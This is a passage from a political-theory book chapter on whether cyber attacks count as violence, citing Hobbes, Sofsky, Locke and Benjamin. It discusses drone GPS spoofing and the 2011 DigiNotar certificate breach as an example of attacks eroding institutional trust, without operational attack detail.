conventional alternative. So the outcome of the cyber attack was in 
some ways equivalent to that of a physical attack: a disabled air defense 
system. But was the cyber attack violent? 

Any serious discussion of cyber war necessarily rests on a foundation. 
This foundation is our understanding of the nature of violence, and by 
extension our understanding of violence in cyberspace. And as with 
cyber war and cyber weapons, understanding the nature of violence in 
cyberspace means understanding the nature of the former phenomenon 
first. Only then can the key questions be tackled: what is violence in the 
context of cyber attacks? Does the notion of violence change its meaning 
when it is applied to cyberspace? The answer therefore depends on where 
a line is drawn between a violent act and a non-violent act, and on what 
we consider to be violence and what we do not consider as violence. This 
understanding of violence also forms the foundation for our 
understanding of political, economic, military, and especially ethical 
considerations of all cyber attacks, be they violent or otherwise. 

This chapter puts forward a simple argument with a twist: most cyber 
attacks are not violent and cannot sensibly be understood as a form of 
violent action. And those cyber attacks that actually do have the 
potential of force, actual or realized, are bound to be violent only indirectly. 
Violence administered through cyberspace is less direct in at least four 
ways: it is less physical, less emotional, less symbolic, and, as a result, less 
instrumental than more conventional uses of political violence. Yet cyber 
attacks, be they non-violent or in very rare cases violent, can achieve the 
same goal that political violence is designed to achieve: namely, to 
undermine trust, and specifically collective social trust in specific 
institutions, systems, or organizations. And cyber attacks may undermine 
social trust, paradoxically, in a more direct way than political violence, 
by taking a non-violent shortcut. Moreover, they can do so by remaining 
entirely invisible. 

The argument is outlined in four short steps. The chapter starts by 
considering the various media through which violence can be expressed. 
Secondly the crucial role of the human body in committing as well as 
receiving acts of violence will be discussed. The chapter then briefly 
clarifies the concept of violence, in juxtaposition to power, authority and, 
most importantly, force, highlighting the symbolic nature of instruments 
of force. The argument finally discusses trust and the most important 
limitation as well as the most important potential of cyber attacks. 

Violence is conventionally administered in one of three ways— 
through force, through energy, or through agents. A new fourth medium 
is code, which is bound to be more indirect—if it is to be included as a 
separate medium at all. The first two categories are borrowed from 
physics, the third from chemistry and biology. The first instance—force—is 
the most obvious. In physics, force is described as an influence that 
changes the motion of a body, or produces motion or deformation in a 
stationary object. The magnitude of force can be calculated by 
multiplying the mass of the body by its acceleration, and almost all weapons 
combine physical mass with acceleration, be it a fist, a stone, a pike, a 
bullet, a grenade, even a missile. The second medium—energy—is 
perhaps somewhat less obvious at first glance, but is almost as old as the 
use of mechanical force to coerce, hurt, or kill other human beings. Fire, 
heat, and explosions are used as powerful and highly destructive media 
of violence. Sun Tzu, the ancient Chinese author of The Art of War, had 
a chapter on “attack by fire.” 1 Less common uses of energy at war 
include the use of electricity, for instance in Tasers, or lasers. Agents are 
the third medium of violence. Some weapons rely neither on physical 
force nor on energy, but on agents to do the work of harming the target. 
The most obvious examples are biological weapons and chemical 
weapons—after all, such agents do not have to be fired in an artillery shell 
or missile, which physically thrusts them into a target perimeter to 
deliver the deadly payload. The agent does the harm. Weaponized agents 
impair the human organism and lead to injury or death: anthrax, 
endospores that cause respiratory infection, and in a high number of 
infections ultimately respiratory collapse; mustard gas, a chemical agent, 
causes blisters, burns, and is strongly carcinogenic. 

Any discussion of violence in the context of cyber attacks needs to 
start by recognizing some basic philosophical insights. In contrast to 
almost all instruments that may be used for violent effect, code differs 
in two notable ways. The first basic limitation is that code-caused 
violence is indirect: it has to “weaponize” the target system in order to turn 
it into a weapon. Code doesn’t have its own force or energy. Instead, any 
cyber attack with the goal of physical destruction, be it material 
destruction or harming human life, has to utilize the force or energy that is 
embedded in the targeted system or created by it. Code, quite simply, 
doesn’t come with its own explosive charge. Code-caused destruction is 
therefore parasitic on the target. Even the most sophisticated cyber attack 
can only physically harm a human being by unleashing the violent 
potential that is embedded in that targeted system. This could be a 
traffic control system, causing trains or planes to crash; a power plant that 
may explode or emit radiation; a dam that may break and cause a 
devastating flash flood; a pipeline that may blow up; hospital life support 
systems that may collapse in emergency situations; or even a pacemaker 
implanted in a heart patient that could be disrupted by exploiting 
vulnerabilities in its software. Yet so far, no such scenario has ever happened 
in reality. Lethal cyber attacks, while certainly possible, remain the stuff 
of fiction novels and action films. Not a single human being has ever 
been killed or hurt as a result of a code-triggered cyber attack. 

Computer code can only directly affect computer-controlled machines, 
not humans. At first glance the way a biological virus harms a system 
may be compared to the way a computer virus—or other malware— 
harms a computer system. Jürgen Kraus, a German student, coined this 
metaphoric comparison, and the term computer virus itself, in 1980. 
In his MA dissertation, “Reproduktion bei Programmen,” Kraus argued 
that self-reproducing programs would be inconsequential if they did 
not reside inside the memory of a computer: “Only inside the 
computer, and only if the program is running, is a self-reproducing program 
in a position for reproduction and mutation.” 2 Kraus then pointed to 
an important difference: a biological virus could start its own 
reproductive process, but a computer virus would rely on activation through the 
operating system. The most crucial difference was so obvious to Kraus 
that he didn’t have to mention it: biological viruses can only affect 
biological systems; computer viruses can only affect machines that rely 
on code. Put simply, a biological virus cannot directly harm a building 
or vehicle, and a computer virus cannot directly harm a human being 
or animal. 

Finally, one special hypothetical case of a parasitic cyber attack should 
be mentioned. Many modern weapon systems, from artillery guns to 
naval drones, are controlled by software, by computer code. An 
increasing number of such systems will be equipped with varying 
degrees of autonomous decision-making capabilities in the future. The 
International Committee of the Red Cross has recognized this trend and 
has already started considering possible adaptations to the law of armed 
conflict. Yet caution is warranted. Code that is a built-in component of 
a weapon system should not be seen as part of a cyber attack—otherwise 
the concept would lose its meaning: every complex weapon system that 
uses computers in one way or the other would then count as a form of 
cyber attack. That would not make sense. But there is one exception: an 
automated complex weapon system becoming the target of a breach. If 
weaponized code can only unlock physical destruction by modifying a 
targeted system, then the perfect target system is one that gives the 
attacker maximum flexibility and maximum potential for damage: in theory, 
an armed remotely controlled aircraft, such as a Predator or Reaper 
drone, is a far more attractive target for a cyber attack than a power 
plant or an air-traffic control system. In such a scenario, the aggressor 
would not merely weaponize a clunky system that was never designed to 
be a weapon—the attackers could actually “weaponize” a weapon. In 
practice, however, such an episode has never happened and indeed is 
difficult to imagine. The only incident on record that comes close to 
such an attack occurred in late June 2012: researchers from the 
University of Texas at Austin’s Radionavigation Laboratory hijacked a small 
surveillance drone during a test-flight in a stadium in Austin, Texas. The 
academics “spoofed” the drone’s GPS system by infiltrating the 
machine’s navigation device with a signal that was more powerful than 
the one received from satellites used for legitimate GPS navigation. This 
meant that the scholars could override the drone’s commands and thus 
control its flight path. The device they used allegedly cost only $1,000 
to build, Fox News reported. 3 A far better-known incident is a 
questionable example: in the first days of December 2011, a CIA-operated 
American Lockheed Martin RQ-170 Sentinel drone fell into Iranian 
hands near the city of Kashmar, in the country’s north-east. An 
anonymous Iranian engineer who worked on analyzing the captured drone 
claimed that electronic warfare specialists had spoofed the drone’s GPS 
navigation. 4 After a ten-week review of the incident the CIA reportedly 
found that a faulty data stream had caused operators to lose contact with 
the drone, rather than Iranian interference or jamming. 5 While spoofing 
is technically possible, it is very unlikely that such an attack could 
succeed against a more complex armed military drone in the field: the 
controls are likely to be encrypted, altitude can be a problem, and 
deceiving a GPS receiver is not the same as infiltrating the control system that 
can unleash a military drone’s deadly missiles against specified targets. 

The human body, the previous pages argued, is not directly vulnerable 
to cyber attack, only indirectly. But the human body, in several ways, is 
the foundation of violence. It enables both the act of attacking and of 
being attacked. Understanding this foundational role of the human 
body is necessary to see the emotional limitations of code-borne 
violence, as well as the symbolic limitations of cyber attack. 

Taking the human body as the starting point for political theory has 
a long tradition, especially among political philosophers concerned with 
the phenomenon of violence and how to overcome it. The human body’s 
vulnerability is its most notable feature in most such considerations of 
political theory. Thomas Hobbes and his reflections on the vulnerability 
of the unprotected human existence probably come to mind first. The 
driving force for all political organization is the universal weakness of all 
humans and their resulting dependence on protection. The opening 
paragraph of Chapter 13 of Leviathan deserves to be read in full: 

Nature has made men so equall, in the faculties of body, and mind; as that 
though there bee found one man sometimes manifestly stronger in body, 
or of quicker mind then another; yet when all is reckoned together, the 
difference between man, and man, is not so considerable, as that one man 
can thereupon claim to himselfe any benefit to which another may not 
pretend, as well as he. For so as to the strength of the body, the weakest has 
the strength enough to kill the strongest, either by secret machination, or 
by confederacy with others, that are in the same danger with himselfe. 6 

This equalizing vulnerability forms the conceptual basis for Hobbes’s 
famous state of the war of all against all, and the normative basis for the 
social contract to overcome the resulting “natural” state of anarchy. This 
state of war, and the absence of political order, prevents all meaningful 
social development and civilization. The consequence, in Hobbes’s most 
famous words, would be “continuall feare, and danger of violent death,” 
which would inevitably make the life of man “solitary, poore, nasty, 
brutish, and short.” 7 Self-help, therefore, needed to be rejected and 
violence taken away from man, monopolized, 8 and given to the collective, 
the “commonwealth.” It is important to note that this basic insight 
forms the continued foundation of most contract theory, legal theory, 
and indeed the modern notion of the state. 9 

Wolfgang Sofsky, a more recent German political theorist, is also 
noteworthy in this context. The political philosopher wrote a highly 
inspiring work about violence, entitled Traktat über die Gewalt 
(Pamphlet on Violence). 10 The book is especially useful in the context of the 
present inquiry because, like cyber attacks, it ignores the state’s frontiers, 
and does not limit itself to internal or external violence. For Sofsky, 
whether domestically or internationally, the body is the center of human 
existence. It is because of man’s bodily existence that all humans are 
verletzungsmächtig, able to hurt, and verletzungsoffen, able to be hurt. 11 
The body, in other words, is the first instrument of violence, and it is the 
first target of violence. The two sides—the active and the passive; 
aggression and protection; offense and defense—will be considered in turn. 

The body is the first and foremost target of violence. Even if more 
advanced weapons are designed to destroy buildings, bunkers, or 
barricades, their ultimate aim always remains the human body. Appreciating 
this foundation is crucial. The experience of physical violence at the 
hands of a criminal or an enemy is a life-changing event for the survivor 
that transcends the moment of aggression. It stays with the victim. 
Sofsky puts this in drastic but appropriate language. Somebody else’s 
death may leave a painful hole in the social fabric of a family, village, or 
country. But the situation is different for the survivor of a violent attack. 
Depending on the attack’s intensity, the victim has made personal 
acquaintance with a life-changing event, with possibly permanent 
injuries, physical as well as psychological ones. Sofsky: 

Pain is the material portent of death, and fear [of pain] is ultimately only 
an offspring of the fear of death. Pain forces man to feel what ceases to be 
felt in death, the tenuousness of the body, the destruction of the mind, the 
negation of existence. The survivor knows this in his flesh. He feels that 
dying has begun. 12 

Violence, like serious illness, confronts individuals with the fragility 
of their existence, with the proximity of death. Anyone who has spent 
time in a war zone, even if they were spared a personal encounter with 
violence, understands this existential dimension. The strong bonds of 
friendship forged in war zones are an expression of this existential and 
highly emotional experience. Individual violence can literally break 
down an individual, cause irreversible trauma, and end his or her 
existence—political violence, likewise, can break down a political 
community, cause deep collective trauma, and even upend its existence entirely. 
Therefore, Sofsky concluded, “no language has more power to persuade 
than the language of force.” 13 

From this follows the second major limitation: violence administered 
through cyberspace is not only indirect and mediated; it is also likely to 
have less emotional impact. Due to its intermediary and roundabout 
nature, a cyber attack is unlikely to release the same amount of terror 
and fear as a coordinated campaign of terrorism or conventional military 
operations would produce. A coordinated cyber attack that produces a 
level of pain that could sensibly be compared to that which a 
well-executed air campaign can inflict on a targeted country is plainly 
unimaginable at present. 14 And here a comparison with airpower may be 
instructive: the use of airpower has historically been overestimated again 
and again, from the Second World War to Vietnam to the Persian Gulf 
War to the Kosovo campaign to Israel’s 2006 war against Hezbollah. In 
each instance the proponents of punishment administered from the air 
overestimated the psychological impact of aerial bombardments and 
underestimated the adversary’s resilience—and it should be noted that 
being bombed from the air is a most terrifying experience. 15 Against this 
background of consistent hopefulness and overconfidence, it is perhaps 
not surprising that it was air forces, not land forces, that first warmed to 
“cyber” and started to maintain that their pilots would now “fly, fight 
and win” 16 in cyberspace, the much-vaunted “fifth domain of warfare,” 17 
next to land, sea, air, and space. The use of cyber weapons that could 
inflict damage and pain comparable to the pummeling of Dresden, 
London, Belgrade, or Beirut at the receiving end of devastating airpower is, 
at present, too unrealistic even for a bad science fiction plot. 

When the first casualty is caused by a cyber attack—and a “when” 
seems to be a more appropriate conjunction than an “if” here—there is 
no question that the public outcry will be massive, and depending on 
the context, the collective fear could be significant. But after the initial 
dust has settled, the panic is likely to subside and a more sober assess¬ 
ment will be possible. The likely finding will be that, to paraphrase 
Sofsky, in cyberspace the language of force just isn’t as convincing. 
Another reason for the limitations of instruments of violence in cyberspace, 
or cyber weapons, is their symbolic limitation. To appreciate the 
symbolism of weapons, the key is again the body. 

The body is also the first instrument of violence, the first weapon. Here 
the “first” doesn’t indicate a priority, but the beginning of an 
anthropological and ultimately a technical development that is still in full force. 
Three things are constantly increasing: the power of weapons, the skills 
needed to use them, and the distance to the target. Needless to say, it is 
the deadly ingenuity of the human mind that devised most weapons and 
optimized the skills needed to use them and to build them. Yet it was 
the bare body that was man’s first weapon, and all instruments of 
violence are extensions of the human body. Examples of simple weapons, 
such as a club, a knife, or a sword, can help illustrate this unity between 
user and instrument. Martial artists trained in the delicate techniques of 
fencing or kendo, a Japanese form of sword-fighting, will intuitively 
understand that the purpose of intensive training, mental as well as 
physical, is to make the weapon’s use as natural as the use of one’s arms 
or legs, and vastly more efficient. Hence expressions such as “going into 
the weapon,” “becoming one” with it, or “feeling” it. Such expressions 
are not just familiar to fencers, archers, or snipers. The unity between 
the fighter and his or her weapon is not limited to the relatively simple, 
traditional instruments of harm. It also applies to more complex weapon 
systems. The E-15 pilot or the artillery gunner equally accumulate large 
numbers of hours in flight or on range in order to routinize the use of 
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these instruments of harm. The goal is that the pilot does not have to 
think about the basics any more, even in more complex maneuvers 
under high stress, and instead is able to focus on other aspects of an 
operation. The plane, ultimately, becomes an extension of the pilot’s 
body as well. And the more complex a weapon, the more its use becomes 
the prerogative of specialists in the use of force who are trained to ope¬ 
rate it. 

Technology affects the relationship between violence and the human body in an uneven way: technology drastically altered the instruments of violence—but technology did not alter the foundation, the ultimate vulnerability of the human body. Technology can physically remove the perpetrator from the inflicted violence, but technology cannot physically remove the victim from the inflicted violence. If the bare human body is the instrument of harm, it is a fist or foot that will hit the victim’s body. If the instrument of harm is a blade, the knife will cut the victim’s skin. An arrow will hit its victim’s shoulder from a small distance. A sniper’s bullet will tear tissue from hundreds of yards. A shell’s detonation will break bones from miles away. A long-range missile can kill human beings across thousands of miles, continents away. Man can delegate the delivery of violence to an artifact, to weapon systems, but the reception of violence remains an intimately personal, bodily experience. The complexity, the precision, and the destructive power of weapon systems, as well as the degree of specialization of those operating them, have been growing continuously.

This ever-increasing power of offensive weapons highlights the symbolic role of instruments of violence—and the third major limitation: using cyber weapons for symbolic purposes. The well-trained body of a boxer or wrestler is a symbol of his or her strength, even outside the ring, outside a fight. The sword is traditionally used as a symbol of glory, martial prowess, and social status. Showing weapons, consequently, becomes a crucial part of their use and justification. In Yemen, for instance, the jambeeya, a traditional dagger worn like a giant belt-buckle, is still a man’s most visible symbol of social standing. In New York City and elsewhere, a police officer with a holstered gun imposes more respect than an unarmed sheriff. In Beijing, military parades are perhaps the most obvious spectacle literally designed to show the state’s imposing power. There is even an entire range of military operations largely executed for the purpose of display. Examples can be found on strategic and tactical levels: deploying major assets, such as a carrier strike group, at strategically significant points, or merely a patrol, be it marching, driving, sailing, or flying. 18 Most explicitly, airpower may be deployed in so-called “show of force” operations, such as a deliberately low flyover by a military aircraft, designed to intimidate the enemy tactically. As the power of weapons increases along with the required skills of their users and the distance they can bridge, the need for symbolism increases as well: displaying weapon systems and threatening their use, in many situations, becomes more cost-efficient than using them. Politically and ethically the symbolic use of weapons is also strongly preferable. Nuclear weapons are the most extreme expression of this trend. But cyber assets are different. Showing the power of cyber weapons is vastly more difficult than showing the power of conventional weapons, especially if the purpose is to administer a threat of force, not actually using force itself. Exploit code cannot be paraded on the battlefield in a commanding gesture, let alone displayed in large city squares on imposing military vehicles. In fact, publishing dangerous exploit code ready to be unleashed (say, for the sake of the argument, on the DoD’s website) would immediately lead to patched defenses and thus invalidate the cyber weapon before its use. Using cyber weapons, for instance to fire a warning shot in the general direction of a potential target once for a show-of-force operation, comes with a separate set of problems. The next chapter will explore some of these limitations in more detail. The argument here is that displaying force in cyberspace is fraught with novel and unanticipated difficulties.

So far, three limitations of violence in cyberspace have been introduced: code-induced violence is physically, emotionally, and symbolically limited. These limitations were straightforward and highlighting them did not require significant conceptual groundwork. This is different for both the most significant limitation of cyber attacks 19 and their most significant potential. To bring both into relief, a more solid conceptual grounding in the political thought on violence is required. (Note to readers: this book caters to a diverse audience, those interested in conflict first and in computers only second, and to those interested primarily in new technologies and their impact on our lives. For readers from either group, political theory may not be the first reading choice. Yet especially those readers with a practical bent are encouraged to engage with the following pages. These conceptual considerations are not introduced here as a scholarly gimmick. Indeed theory shouldn’t be left to scholars; theory needs to become personal knowledge, conceptual tools used to comprehend conflict, to prevail in it, or to prevent it. Not having such conceptual tools is like an architect lacking a drawing board, a carpenter without a metering rule, or, indeed, a soldier without a rifle.)

Political violence is always instrumental violence, violence administered (or threatened) in the service of a political purpose, and that purpose is always to affect relationships of trust. Violence can either be used to establish and to maintain trust, or it can be used to corrode and to undermine trust. Terrorism, for instance, is a means to undermine a society’s trust in its government. Violence can be used to maintain or re-establish trust, for instance by identifying and arresting criminals (or terrorists), those who broke the social contract by using force against other citizens and their property. The political mechanic of violence has two starkly contrasting sides, a constructive and a destructive side, one designed to maintain trust, the other designed to undermine trust. The two are mutually exclusive, and will be considered in turn. Only then can the utility of cyber attacks be considered respectively.

A brief word on trust is necessary here. Trust is an essential resource in any society. 20 Perhaps because of this towering significance, trust and trustworthiness are highly contested concepts in political theory. Because trust is so important yet so abstract and contested, concisely defining the use of the term is crucial for the purposes of the present argument. Political thought distinguishes between two rather different kinds of trusting: trust should first be understood as an interpersonal relationship between two individuals. 21 Examples are the kind of trust relationships that exist between me and my brother, between you and your plumber, or between a customer and a taxi driver. Such relationships of trust are always directed towards an action: my brother may trust me to take care of his daughter while he’s away; you trust your plumber to fix the bathroom boiler while you are at work; and a traveler trusts the cabbie to go the right way and not rob them. The second kind of trust refers to a collective attribute rather than to an individual’s psychological state: the trust that individuals collectively place into institutions. 22 Such an institution can be a bank, a solicitor, an airline, the police, the army, the government, or more abstract entities like the banking system or the legal order more generally. Again, such relationships of institutional trust are related to an activity or service: customers trust their bank not to steal money from them, they trust airlines to maintain and operate planes properly, and citizens trust the police to protect them when necessary. At second glance, interpersonal trust and institutional trust are connected. You are likely to trust your plumber not because he’s such a trustworthy person per se, but because you know that law enforcement in England or France or Germany is set up in a way that, if he betrays your trust, he will face legal punishment. Something similar applies to the taxi ride. Consequently, an astute traveler looking out for a taxi ride across Cairo just after the 2011 revolution, with law and order having partly collapsed, is likely to place far less trust into the orderly behavior of a random cab driver. This means that trustworthy and stable legal institutions only enable interpersonal trust between individuals who may represent those institutions or be bound by them. 23

Focusing on trust significantly broadens the horizon of the analysis of political violence. At the same time it offers a more fine-grained perspective on the purpose of an attack, and this increased resolution is especially useful when looking at various kinds of cyber attacks. The goal of an attack—executed by code or not, violent or not—may be more limited than bringing down the government or challenging its legitimacy in a wholesale fashion. Not all political violence is revolutionary, not all activists are insurgents, and not all political attacks are violent. The goal of an attack may be as distinct as a specific policy of a specific government, a particular business practice of a particular corporation, or the reputation of an individual.

Violence, in the hands of the established order, is designed to maintain social trust. To appreciate the depth of this insight, consider three well-established maxims of political theory. First, violence is an implicit element of even the most modern legal order. Any established political order comes with a certain degree of violence built-in—consolidated states, after all, are states because they successfully maintain a monopoly over the legitimate use of force. Any legal order, to use the language of jurisprudence, is ultimately a coercive order. 24 One of the most inspiring writers on this subject is Alexander Passerin d’Entreves, a twentieth-century political philosopher from the multi-lingual Aosta Valley in the Italian Alps. In his book, The Notion of the State, the political philosopher discusses the state and its use of force at length. “The State ‘exists’ in as far as a force exists which bears its name,” he wrote, referring to the tacit nature of the potential threat of force that is the subtext and foundation of any rule of law. “The relations of the State with individuals as well as those between States are relations of force.” 25 One of Hobbes’s most famous quotes captures this tacit presence of force in the authority of the law, “Covenants, without the sword, are but words.” 26

This tacit violence, secondly, becomes power. And it is trust that turns 
violence into power. To be more precise: social trust, ultimately, relies on 
the functioning of the rule of law, and the rule of law in turn relies on 
the state effectively maintaining and defending a monopoly of force, 
internally as well as externally. This thought may appear complex at first 
glance, but it forms the foundation of the modern state. In fact this 
question is at the root of much of a vast body of political theory, a body 
of literature dedicated, in Passerin d’Entreves’s words, to the long and 
mysterious ascent that leads from force to authority, to asking what 
transforms “force into law, fear into respect, coercion into consent— 
necessity into liberty.” It is obviously beyond the capacity of the present 
analysis to go into a great level of detail here. But a short recourse to a 
few of the most influential political thinkers will help make the case that 
trust is a critically important concept. Again Hobbes: 

The Office of the sovereign, be it a monarch or an assembly, consisteth in the end, for which he was trusted with the sovereign power, namely the procuration of the safety of the people. 27

Collective trust in the institutions of the state is one of the features 
that turn violence into power. John Locke, a philosopher of almost 
equal standing to Hobbes in the history of Western political thought, 
captured this dynamic eloquently. For Locke, trust is an even more 
central concept: 

[P]olitical power is that power which every man having in the state of Nature has given up into the hands of the society, and therein to the governors whom the society hath set over itself, with this express or tacit trust, that it shall be employed for their good and the preservation of their property. 28

Force, when it is used by the sovereign in order to enforce the law, ceases to be mere violence. By representing the legal order, force becomes institutionalized, “qualified” in Passerin d’Entreves’s phrase, “force, by the very fact of being qualified, ceases to be force” and is being transformed into power. 29
Thirdly, political violence—whether in its raw form or in its tacit, qualified form as power—is always instrumental. “Violence can be sought only in the realm of means, not of ends,” wrote Walter Benjamin, an influential German-Jewish philosopher and literary critic. His essay, Critique of Violence, published in the author’s native German as Kritik der Gewalt in 1921, is a classic in the study of violence. 30 Benjamin also pointed to a fundamentally constitutional character of violence, its “lawmaking” character. “People give up all their violence for the sake of the state,” Benjamin writes, in agreement with realist political theorists and positivist legal thought. 31 He then distinguishes between a “law-preserving function” of violence and a “lawmaking function” of political violence. 32

While there is some consensus on a theory of war, and certainly on a theory of law, there is little consensus on a theory of violence—although both war and law employ force and ultimately violence. Perhaps not surprisingly, a significant amount of political thought on violence—like on war and law—comes from philosophers and political thinkers who were German, or at least German-speaking. The German word for violence is Gewalt. This is not surprising for two reasons: one, because the country’s history was exceptionally violent, especially during the nineteenth and the first half of the twentieth century, when most landmark texts were written. Its authors include Karl Marx, Max Weber, Walter Benjamin, Hannah Arendt, and Carl Schmitt, all of whom wrote classics in sociology and political science. But it also includes authors like Carl von Clausewitz, who wrote one of the founding texts of the theory of war, On War, and Hans Kelsen, whose oeuvre includes one of the founding texts of jurisprudence, The Pure Theory of Law. Gewalt, a word that does not translate directly into English, plays a key role in all of these texts. It is indeed a forceful concept. This leads to the other reason for the prevalence of German authors in this field: the German language “qualifies” violence from the start—or more precisely, it never disqualified Gewalt, it never distinguished between violence, force, and power. Gewalt can be used as in Staatsgewalt, the power of the state, or as in Gewaltverbrechen, violent crime. These basic concepts of classical political theory bring into relief the most important limitation as well as the most important potential of cyber attacks.

The utility of cyber attacks—be they violent or non-violent—to establish and maintain trust is crucially limited. First, violent cyber attacks, or the threat of violent cyber attacks, are unlikely to ever be an implicit part of a legal order. Neither espionage, nor sabotage or subversion, has the potential to maintain let alone establish a coercive order. Domestic surveillance may be used as a supplemental and highly controversial tool for that purpose, but not as the actual instrument of coercion. From this follows, secondly, that the notion of “cyberpower,” properly defined, is so shaky and slippery as to be useless. The notion of Cybergewalt, in other words, doesn’t make a lot of sense at present. Hence, thirdly, code-borne violence is hugely limited in its instrumentality: it has little to no trust-maintaining potential, and may only contribute to undermining trust. This limiting insight at the same time points to the most significant potential of cyber attacks: cyber attacks can achieve similar or better effects in a non-violent way.

Political violence is also a means of eroding trust. The perpetrators of political violence, especially in its most extreme form, terrorism, almost always clamor for publicity and for media attention, even if no group claims credit for an attack. The rationale of maximum public visibility is to get one crucial statement across to the maximum number of recipients: see, your government can’t protect you, you can’t trust the state to keep you safe. This logic of undermining a government’s trustworthiness applies in two scenarios that otherwise have little in common. One is indiscriminate terrorist violence where random civilians are the victims, including vulnerable groups, such as the elderly, women, and children. All political violence, but especially the most brutal indiscriminate kind, also sends a message that is likely to cross the militants’ interest: we don’t discriminate, we’re brutal, we don’t respect the life of innocents. But in the heat of violent internal conflict, the utility of progressively undermining the population’s trust in the government outweighs these reputational costs. The other scenario is regular, state-on-state war. When one country’s army goes to war against another country’s armed forces, one of the key objectives is to undermine the link between the population and its own government. That link is a form of institutional trust. Clausewitz famously described the population as one of the three elements of a “fascinating trinity” (the other elements being the government and the army). The population, the Prussian philosopher of war wrote, is the source of passion and the energy that is required to sustain a nation’s war effort. Therefore, if the majority of the population loses faith in its government’s and army’s ability to prevail, then public opinion and morale will collapse. This dynamic does not just apply to democracies, but to all political systems, albeit in different ways. Modern armed forces, not unlike militant groups, are therefore seeking to maximize the public visibility of their superior firepower. 33 In both regular and irregular conflict, for generals and terrorists, one of the main goals is to convince opinion leaders in a country’s wider population that their present regime will be unable to resurrect and maintain its monopoly of force—either externally or internally.

Cyber attacks can undermine an institution’s trustworthiness in a non-violent way. Here the context matters greatly. Of course the use of political violence is not the only way to undermine trust in a government, an institution, a policy, a company, or somebody’s competence. It is not even the most common method, nor is it the most efficient or most precise one. Violence is merely the most extreme form of political attack. In liberal democracies, such as the United States, most forms of non-violent political activism and protest are not just legal, but are also considered legitimate, especially in hindsight, for instance the civil rights movement in the United States. But even extreme forms of activism and political speech are protected by the American Constitution’s First Amendment. 34 In less liberal political communities, certain forms of non-violent political activism will be illegal. The more illiberal a system, the more non-violent dissent will be outlawed (the chapter on subversion below will explore this problem in more detail).

Cyber attacks, both non-violent as well as violent ones, have a significant utility in undermining social trust in established institutions, be they governments, companies, or broader social norms. Cyber attacks are more precise than conventional political violence: they do not necessarily undermine the state’s monopoly of force in a wholesale fashion. Instead they can be tailored to specific companies or public sector organizations and used to undermine their authority selectively. The logic of eroding trust by means of cyber attack is best illustrated with examples. Four examples will help extract several insights.

The first and most drastic is the DigiNotar case, a hacking attack on a computer security company. DigiNotar used to be a leading certificate authority based in the Netherlands, initially founded by a private lawyer in cooperation with the official body of Dutch civil law notaries. Certificate authorities issue digital certificates, and DigiNotar was founded to do so for the Dutch government as well as commercial customers. In cryptographic terms, the certificate authority is a so-called trusted third party, often abbreviated as TTP, and effectively acts as a provider of trust between two other parties. It does so by certifying the ownership of a public key by the named “subject” (the owner) of the certificate. A browser usually displays the presence of a certified website by a small green lock or other green symbol on the left side of the browser’s address bar. All mainstream browsers were configured to trust DigiNotar’s certificates automatically. Significantly, some of the Dutch government’s most widely used electronic services relied on certificates issued by the compromised firm, for example the country’s central agency for car registration, Rijksdienst voor het Wegverkeer, or DigiD, an identity management platform used by the Dutch Tax and Customs Administration to verify the identity of citizens online by using the country’s national identification number, the Burgerservicenummer. Given the nature of DigiNotar’s services as a certificate authority—trust was its main product—it was by definition highly vulnerable to cyber attack.

That attack happened on 10 July 2011. 35 The self-styled “Comodo Hacker” gained access to the firm’s computer systems and, over the next ten days, issued more than 530 fraudulent certificates, including certificates pretending to be from Google, Skype, and Mozilla, but also from major Western intelligence agencies, such as the CIA, the Mossad, and the British MI6. 36 Nine days later, on 19 July, DigiNotar’s staff had detected an intrusion into its certificate infrastructure, but the firm did not publicly disclose this information at the time. The company revoked all the fraudulent certificates it detected, about 230 in total, but that meant that it failed to revoke more than half of the fraudulent certificates. 37 At least one certificate was then used for so-called man-in-the-middle attacks against users of Gmail and other encrypted Google services. By intercepting the traffic between Google and the user, unknown attackers were able to steal passwords and everything else that these unsuspecting users typed or stored in their account. The Dutch security firm did not usually issue certificates for the Californian search giant. But the fact that Google had no business relationship with the issuer of the certificate did not make the attack any less effective—all mainstream browsers, from Firefox to Chrome to Internet Explorer, accepted DigiNotar’s faked certificate as credible anyway. Only six weeks later, on Saturday, 27 August, one user in Iran noticed something was wrong. Alibo, as he chose to call himself, was running the latest version of Google’s Chrome browser and noticed an unusual warning when he checked his emails on Gmail. Just two months earlier, in May 2011, Google added the “public key pinning” feature to its browser. This meant that Google essentially “hard-coded” fingerprints for its own web services into Chrome. Chrome then simply ignored contrary information from certificate authorities, and displayed a warning to users. 38 Alibo saw this warning and posted a question on a Google forum that Saturday, “Is this MITM to Gmail’s SSL?” he asked in broken geek jargon, referring to a man-in-the-middle attack and a common encryption protocol, Secure Sockets Layer. 39

The reaction came quickly. After all, this was the first time that the malicious use of a fake certificate on the Internet had come to light, as was pointed out by the Electronic Frontier Foundation, a group that protects civil liberties online. 40 By Monday, Internet Explorer, Firefox, and Chrome had been updated, and patched versions rejected all of DigiNotar’s certificates and displayed a warning to the user. “Browser makers Google, Mozilla and Microsoft subsequently announced that they would permanently block all digital certificates issued by DigiNotar, suggesting a complete loss of trust in the integrity of its service,” Wired magazine reported. The affair, and the Dutch certificate authority’s handling of the breach, fatally undermined the trust that its users and customers had placed in the firm. The Dutch Ministry of the Interior even went so far as to announce that the government of the Netherlands was no longer able to guarantee that it was safe to use its own websites. On 20 September 2011, DigiNotar’s owner, VASCO, announced that the company was bankrupt.

The hack was highly significant. It enabled a deluge of second-order attacks. When a certificate is used, the browser sends a request to a responding server at the certificate issuing company by using a special Internet protocol, the Online Certificate Status Protocol, or OCSP, to obtain a certificate’s revocation status. The protocol reveals to the responder that a particular network host is using a particular certificate at a particular time. The first fake *.google.com certificate status request came on 27 July, seventeen days after the certificate had been issued. A week later, on 4 August, the numbers of requests to DigiNotar’s OCSP responders “massively” surged, the official investigation found. The affected users, Google reported, were mostly in Iran. 41 The suspicion was that Iranian dissidents, many of whom trusted Google for secure communications, had been targeted in the attack. 42 Around 300,000 unique IPs requesting access to Google were identified, with more than 99 per cent coming from Iran. Those that did not come from Iran were mainly due to Iranian users hiding behind a proxy server abroad. This means that somebody in Iran was trying to spy on more than a quarter of a million users in a very short period of time. 43 The question of who that somebody was remains unanswered. The initial attack on DigiNotar may be the work of a single hacker. The infamous Comodo Hacker, named after an earlier attack on a company called Comodo, described himself as a 21-year-old student of software engineering in Tehran—and a pro-establishment patriot. 44 In an interview with The New York Times shortly after the notorious attack, he claimed to revere Ayatollah Ali Khamenei and despise Iran’s dissident Green Movement. Comodo Hacker chose that particular certificate authority from a larger list of such companies because it was Dutch, he told the Times. 45 The allegedly angry student blamed the Dutch government for 